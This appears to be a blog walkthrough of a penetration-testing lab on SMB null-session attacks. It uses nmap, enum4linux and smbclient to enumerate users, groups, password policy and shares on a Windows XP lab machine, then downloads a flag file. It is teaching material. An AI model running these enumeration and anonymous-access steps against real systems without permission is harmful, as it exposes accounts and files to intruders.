The final goal of the blog is to tell you how to retrieve information from the target machine such as shares, users, groups and so on! Moreover by navigating the remote machine, you should be able to find a file name "Congratulations.txt\". Download it and explore its content.
A windows share machine can share a file or a directory on the network; this lets local and remote users access the resources and, possible, modify it. Eliminate Your Fears And Doubts About Null Session Attack
Example
A file server in an office lets users open and edit the document of their own departement, while it lets everyone read but modify public information files.
This features is very useful in a network environment. The ability to share resources and files reduces redundancy and can improve work efficiency in a company.Shares can be either extremely useful if used properly or extremely dangerous when configured improperly.Creating network shares in a windows based environment is fairly easy. Generally uses just need to turn on the file and printer sharing services and then they can start using directories or files to share.
Users can also set permissions on a share showing who can perform operations such as reading and writing and modifying permissions. Starting from windows which the users can choose to share a single file or use the public directory when sharing a single file they can choose local or remote users to share the file with.When using the public directory they can choose which local users can access the files on the share but they can only allow everyone or no one in the network to access the share.
An authorised user can access share by using universal naming convention path (UNC path).
The Format of a UNC path is-
\\ServerName\ShareName\file.nat
Administrative shares
There are also some special default administrative shares which are used by system administrators and windows itself:
\\Computer Nmae\C$ lets and administrator access a volume on the local machine. Every volume has a share (C$, D$, E$, etc).
\\ComputerName\admin$ points to the windows installation directory.
\\ComputerName\ipc$ is used for inter-process communication. You cannot browse it via windows explorer.
You can test volume share and the admin$ share on your computer by entering the following on a windows explorer address bar
\\localhost\<sharename>
\\localhost\d$
Null session attacks can be used to enumerate write a lot of information. Attackers can steal information about-
# Passwords
# System Users
# System Group
# Running system processes
Null sessions remotely exploitable this means that attackers can use their computers to attack a vulnerable windows machine. Moreover, this can be used to call remotely API and remote procedure calls because of these factors Null session attack had a huge impact on windows ecosystem.
Nowadays is configured to be a immune from this kind of attack. However, legacy hosts can still be vulnerable.
A null session case and vulnerability for windows administrative shares, this lets an attacker and connect to a local or remote share without authentication.
We will go through the enumeration of windows shares and their exploitation by using various techniques and tools.
Tools
The best tools for this lab are:
# emun4linux
# samrdump
# smbclient
Steps
# Find a target in the network
# Check for null session
# Exploit null session
It\'s time to get our hands dirty.
# Gather information with enum4linux
Use enum4linux and gather the following information:
# Shares
# Users
# Password policies
# Groups
Use smbclient to navigate the target machine
Mount or use the smbclient interactive command line in order to navigate the remote machine and find and inspect the content of the Congratulations.txt file.
Find a target in the network
We first need to verify which the remote network is. We can do it by running ifconfig and checking the IP address of our tap0 interface.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether b4:b6:86:47:55:83 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 2201 bytes 96326 (94.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2201 bytes 96326 (94.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
tap0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.99.101 netmask 255.255.255.0 broadcast 0.0.0.0
inet6 fe80::5044:42ff:fe4d:3eb6 prefixlen 64 scopeid 0x20<link>
ether 52:44:42:4d:3e:b6 txqueuelen 1000 (Ethernet)
RX packets 3 bytes 363 (363.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 522 bytes 22356 (21.8 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.98.25 netmask 255.255.255.0 broadcast 192.168.98.255
inet6 2409:4064:95:e81b:3e1a:d593:a513:ecb9 prefixlen 64 scopeid 0x0<global>
inet6 fe80::aa80:f129:e78d:aa96 prefixlen 64 scopeid 0x20<link>
ether fc:01:7c:29:00:77 txqueuelen 1000 (Ethernet)
RX packets 92211 bytes 102634365 (97.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 55571 bytes 9521350 (9.0 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$
As we can see the target network is 192.168.99.0/24 (note that your IP address may be different from the previous screenshot). Let\'s run nmap in order to discover alive hosts on the network:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo nmap -sn 192.168.99.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-26 21:02 IST
Nmap scan report for 192.168.99.162
Host is up (0.53s latency).
MAC Address: 00:50:56:A5:DF:D7 (VMware)
Nmap scan report for 192.168.99.101
Host is up.
Nmap done: 256 IP addresses (2 hosts up) scanned in 18.25 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$
The previous screenshot shows that the only host alive on the network is 192.168.99.162 (besides our host: 192.168.99.20).
Check for null session
Let us target the host found in the previous step and check if it is vulnerable to null sessions. In the following screenshot, we are using enum4linux, but you can use any tool you prefer.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ enum4linux -n 192.168.99.162 255 ⨯
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:03:21 2021
==========================
| Target Information |
==========================
Target ........... 192.168.99.162
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
======================================================
| Enumerating Workgroup/Domain on 192.168.99.162 |
======================================================
[+] Got domain/workgroup name: WORKGROUP
==============================================
| Nbtstat Information for 192.168.99.162 |
==============================================
Looking up status of 192.168.99.162
ELS-WINXP <00> - B <ACTIVE> Workstation Service
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
ELS-WINXP <20> - B <ACTIVE> File Server Service
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
WORKGROUP <1d> - B <ACTIVE> Master Browser
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
MAC Address = 00-50-56-A5-DF-D7
=======================================
| Session Check on 192.168.99.162 |
=======================================
[+] Server 192.168.99.162 allows sessions using username '', password ''
=============================================
| Getting domain SID for 192.168.99.162 |
=============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
enum4linux complete on Sun Dec 26 21:03:38 2021
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$
We can see that the File Server Service is active and the string \<20> appears in the list.
Exploit null session
It is time to get our hands dirty!
Gather information with enum4linux
Let us try to gather as much information as we can. To do this we can simply run enum4linux with the -a switch:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ enum4linux -n 192.168.99.162 255 ⨯
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:03:21 2021
==========================
| Target Information |
==========================
Target ........... 192.168.99.162
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
======================================================
| Enumerating Workgroup/Domain on 192.168.99.162 |
======================================================
[+] Got domain/workgroup name: WORKGROUP
==============================================
| Nbtstat Information for 192.168.99.162 |
==============================================
Looking up status of 192.168.99.162
ELS-WINXP <00> - B <ACTIVE> Workstation Service
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
ELS-WINXP <20> - B <ACTIVE> File Server Service
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
WORKGROUP <1d> - B <ACTIVE> Master Browser
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
MAC Address = 00-50-56-A5-DF-D7
=======================================
| Session Check on 192.168.99.162 |
=======================================
[+] Server 192.168.99.162 allows sessions using username '', password ''
=============================================
| Getting domain SID for 192.168.99.162 |
=============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
enum4linux complete on Sun Dec 26 21:03:38 2021
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ enum4linux -a 192.168.99.162
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:05:14 2021
==========================
| Target Information |
==========================
Target ........... 192.168.99.162
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
======================================================
| Enumerating Workgroup/Domain on 192.168.99.162 |
======================================================
[+] Got domain/workgroup name: WORKGROUP
==============================================
| Nbtstat Information for 192.168.99.162 |
==============================================
Looking up status of 192.168.99.162
ELS-WINXP <00> - B <ACTIVE> Workstation Service
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
ELS-WINXP <20> - B <ACTIVE> File Server Service
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
WORKGROUP <1d> - B <ACTIVE> Master Browser
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
MAC Address = 00-50-56-A5-DF-D7
=======================================
| Session Check on 192.168.99.162 |
=======================================
[+] Server 192.168.99.162 allows sessions using username '', password ''
=============================================
| Getting domain SID for 192.168.99.162 |
=============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
========================================
| OS information on 192.168.99.162 |
========================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.99.162 from smbclient:
[+] Got OS info for 192.168.99.162 from srvinfo:
192.168.99.162 Wk Sv NT PtB LMB
platform_id : 500
os version : 5.1
server type : 0x51003
===============================
| Users on 192.168.99.162 |
===============================
index: 0x1 RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x2 RID: 0x3eb acb: 0x00000210 Account: eLS Name: (null) Desc: (null)
index: 0x3 RID: 0x3ed acb: 0x00000210 Account: Frank Name: Frank Desc: (null)
index: 0x4 RID: 0x1f5 acb: 0x00000214 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x5 RID: 0x3e8 acb: 0x00000211 Account: HelpAssistant Name: Remote Desktop Help Assistant Account Desc: Account for Providing Remote Assistance
index: 0x6 RID: 0x3ec acb: 0x00000210 Account: netadmin Name: netadmin Desc: (null)
index: 0x7 RID: 0x3ea acb: 0x00000211 Account: SUPPORT_388945a0 Name: CN=Microsoft Corporation,L=Redmond,S=Washington,C=US Desc: This is a vendor's account for the Help and Support Service
user:[Administrator] rid:[0x1f4]
user:[eLS] rid:[0x3eb]
user:[Frank] rid:[0x3ed]
user:[Guest] rid:[0x1f5]
user:[HelpAssistant] rid:[0x3e8]
user:[netadmin] rid:[0x3ec]
user:[SUPPORT_388945a0] rid:[0x3ea]
===========================================
| Share Enumeration on 192.168.99.162 |
===========================================
Sharename Type Comment
--------- ---- -------
My Documents Disk
IPC$ IPC Remote IPC
Frank Disk
C Disk
WorkSharing Disk
FrankDocs Disk
ADMIN$ Disk Remote Admin
C$ Disk Default share
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
[+] Attempting to map shares on 192.168.99.162
//192.168.99.162/IPC$ Mapping: OK Listing: DENIED
//192.168.99.162/Frank Mapping: OK Listing: DENIED
//192.168.99.162/C [E] Can't understand response:
AUTOEXEC.BAT A 0 Fri Feb 13 06:20:47 2015
boot.ini HS 211 Fri Feb 13 06:16:17 2015
CONFIG.SYS A 0 Fri Feb 13 06:20:47 2015
Documents and Settings D 0 Wed Feb 18 14:55:58 2015
IO.SYS AHSR 0 Fri Feb 13 06:20:47 2015
MSDOS.SYS AHSR 0 Fri Feb 13 06:20:47 2015
NTDETECT.COM AHSR 47564 Tue Aug 3 22:38:34 2004
ntldr AHSR 250032 Tue Aug 3 22:59:34 2004
pagefile.sys AHS 805306368 Thu Dec 23 22:59:58 2021
Program Files DR 0 Mon Oct 3 21:40:27 2016
System Volume Information DHS 0 Fri Feb 13 06:24:12 2015
WINDOWS D 0 Mon Oct 3 21:42:49 2016
785224 blocks of size 4096. 345608 blocks available
//192.168.99.162/WorkSharing Mapping: OK, Listing: OK
//192.168.99.162/FrankDocs Mapping: OK Listing: DENIED
//192.168.99.162/ADMIN$ Mapping: DENIED, Listing: N/A
//192.168.99.162/C$ Mapping: DENIED, Listing: N/A
======================================================
| Password Policy Information for 192.168.99.162 |
======================================================
[+] Attaching to 192.168.99.162 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:192.168.99.162)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] ELS-WINXP
[+] Builtin
[+] Password Info for Domain: ELS-WINXP
[+] Minimum password length: None
[+] Password history length: None
[+] Maximum password age: 42 days 22 hours 47 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0
================================
| Groups on 192.168.99.162 |
================================
[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Backup Operators] rid:[0x227]
group:[Guests] rid:[0x222]
group:[Network Configuration Operators] rid:[0x22c]
group:[Power Users] rid:[0x223]
group:[Remote Desktop Users] rid:[0x22b]
group:[Replicator] rid:[0x228]
group:[Users] rid:[0x221]
[+] Getting builtin group memberships:
Group 'Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group 'Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group 'Users' (RID: 545) has member: ELS-WINXP\netadmin
Group 'Users' (RID: 545) has member: ELS-WINXP\Frank
Group 'Guests' (RID: 546) has member: ELS-WINXP\Guest
Group 'Administrators' (RID: 544) has member: ELS-WINXP\Administrator
Group 'Administrators' (RID: 544) has member: ELS-WINXP\eLS
Group 'Administrators' (RID: 544) has member: ELS-WINXP\netadmin
[+] Getting local groups:
group:[HelpServicesGroup] rid:[0x3e9]
[+] Getting local group memberships:
Group 'HelpServicesGroup' (RID: 1001) has member: ELS-WINXP\SUPPORT_388945a0
[+] Getting domain groups:
group:[None] rid:[0x201]
[+] Getting domain group memberships:
Group 'None' (RID: 513) has member: ELS-WINXP\Administrator
Group 'None' (RID: 513) has member: ELS-WINXP\Guest
Group 'None' (RID: 513) has member: ELS-WINXP\HelpAssistant
Group 'None' (RID: 513) has member: ELS-WINXP\SUPPORT_388945a0
Group 'None' (RID: 513) has member: ELS-WINXP\eLS
Group 'None' (RID: 513) has member: ELS-WINXP\netadmin
Group 'None' (RID: 513) has member: ELS-WINXP\Frank
=========================================================================
| Users on 192.168.99.162 via RID cycling (RIDS: 500-550,1000-1050) |
=========================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-21-823518204-2025429265-839522115
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
[+] Enumerating users using SID S-1-5-21-823518204-2025429265-839522115 and logon username '', password ''
===============================================
| Getting printer info for 192.168.99.162 |
===============================================
Cannot connect to server. Error was NT_STATUS_NETWORK_UNREACHABLE
enum4linux complete on Sun Dec 26 22:35:32 2021
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$
As we can see in the previous screenshots, we were able to gather a lot of information from the machine.
Use smbclient to navigate the target machine
A very useful tool that we can use to access remote shares and browse the remote machine is smbclient.
First let us get the list of shares using smbclient:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo smbclient -L WORKGROUP -I 192.168.99.162 -N -U ""
Sharename Type Comment
--------- ---- -------
My Documents Disk
IPC$ IPC Remote IPC
Frank Disk
C Disk
WorkSharing Disk
FrankDocs Disk
ADMIN$ Disk Remote Admin
C$ Disk Default share
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$
Let us now try to access the WorkSharing share and see what files are stored in there:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 1
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo smbclient \\\\192.168.99.162\\WorkSharing -N 1 ⨯
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Feb 18 16:37:31 2015
.. D 0 Wed Feb 18 16:37:31 2015
Congratulations.txt A 66 Wed Feb 18 15:11:59 2015
785224 blocks of size 4096. 345613 blocks available
smb: \>
smb: \> get congratulations.txt /home/hackerboy/Desktop/Penetration-tester-jr/congratulations.txt
getting file \congratulations.txt of size 66 as /home/hackerboy/Desktop/Penetration-tester-jr/congratulations.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \>
As we can see in the previous screenshot there is a file namedCongratulations.txt. Let us download it into our machine and then use the cat command to display its content.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ cat congratulations.txt
Congratulations! You have successfully exploited a null session!
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$